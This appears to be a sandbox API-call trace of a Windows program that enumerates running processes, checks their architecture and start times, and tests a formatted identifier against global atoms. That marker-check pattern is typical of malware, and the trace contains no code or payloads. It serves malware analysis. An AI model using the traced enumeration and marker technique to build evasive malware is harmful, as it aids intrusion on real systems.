	[0133.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.817] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.817] CloseHandle (hObject=0x2dc) returned 1
	[0133.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0133.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.818] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.818] CloseHandle (hObject=0x2dc) returned 1
	[0133.818] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.818] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.818] CloseHandle (hObject=0x2dc) returned 1
	[0133.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.819] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.819] CloseHandle (hObject=0x2dc) returned 1
	[0133.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.819] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.819] CloseHandle (hObject=0x2dc) returned 1
	[0133.819] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.820] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.820] CloseHandle (hObject=0x2dc) returned 1
	[0133.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.820] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.820] CloseHandle (hObject=0x2dc) returned 1
	[0133.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.821] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.821] CloseHandle (hObject=0x2dc) returned 1
	[0133.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.821] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.821] CloseHandle (hObject=0x2dc) returned 1
	[0133.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.822] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.822] CloseHandle (hObject=0x2dc) returned 1
	[0133.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.822] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.822] CloseHandle (hObject=0x2dc) returned 1
	[0133.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.822] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.822] CloseHandle (hObject=0x2dc) returned 1
	[0133.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0133.823] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.823] CloseHandle (hObject=0x2dc) returned 1
	[0133.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0133.823] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.823] CloseHandle (hObject=0x2dc) returned 1
	[0133.823] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.824] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.824] CloseHandle (hObject=0x2dc) returned 1
	[0133.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.824] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.824] CloseHandle (hObject=0x2dc) returned 1
	[0133.824] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.824] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.825] CloseHandle (hObject=0x2dc) returned 1
	[0133.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.825] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.825] CloseHandle (hObject=0x2dc) returned 1
	[0133.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.825] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.825] CloseHandle (hObject=0x2dc) returned 1
	[0133.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.826] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.826] CloseHandle (hObject=0x2dc) returned 1
	[0133.826] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.826] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.826] CloseHandle (hObject=0x2dc) returned 1
	[0133.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0133.827] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.827] CloseHandle (hObject=0x2dc) returned 1
	[0133.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.827] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.827] CloseHandle (hObject=0x2dc) returned 1
	[0133.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.828] CloseHandle (hObject=0x2dc) returned 1
	[0133.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.828] CloseHandle (hObject=0x2dc) returned 1
	[0133.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.828] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.828] CloseHandle (hObject=0x2dc) returned 1
	[0133.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.829] CloseHandle (hObject=0x2dc) returned 1
	[0133.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0133.829] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.829] CloseHandle (hObject=0x2dc) returned 1
	[0133.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0133.830] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.830] CloseHandle (hObject=0x2dc) returned 1
	[0133.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.830] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetLastError () returned 0x5
	[0133.831] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.832] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0133.832] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.832] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.833] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetLastError () returned 0x5
	[0133.834] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.834] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0133.834] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.835] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0133.835] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0133.835] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0133.835] CloseHandle (hObject=0x2dc) returned 1
	[0133.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0133.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.835] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.835] CloseHandle (hObject=0x2dc) returned 1
	[0133.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.836] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.836] CloseHandle (hObject=0x2dc) returned 1
	[0133.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.836] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.836] CloseHandle (hObject=0x2dc) returned 1
	[0133.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.837] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.837] CloseHandle (hObject=0x2dc) returned 1
	[0133.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0133.837] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.837] CloseHandle (hObject=0x2dc) returned 1
	[0133.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.871] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.871] CloseHandle (hObject=0x2dc) returned 1
	[0133.871] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.871] CloseHandle (hObject=0x2dc) returned 1
	[0133.871] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.871] CloseHandle (hObject=0x2dc) returned 1
	[0133.872] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.872] CloseHandle (hObject=0x2dc) returned 1
	[0133.872] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.872] CloseHandle (hObject=0x2dc) returned 1
	[0133.872] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.872] CloseHandle (hObject=0x2dc) returned 1
	[0133.872] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.872] CloseHandle (hObject=0x2dc) returned 1
	[0134.252] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.252] CloseHandle (hObject=0x2dc) returned 1
	[0134.252] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.252] CloseHandle (hObject=0x2dc) returned 1
	[0134.252] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.252] CloseHandle (hObject=0x2dc) returned 1
	[0134.253] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.253] CloseHandle (hObject=0x2dc) returned 1
	[0134.253] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.253] CloseHandle (hObject=0x2dc) returned 1
	[0134.253] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.253] CloseHandle (hObject=0x2dc) returned 1
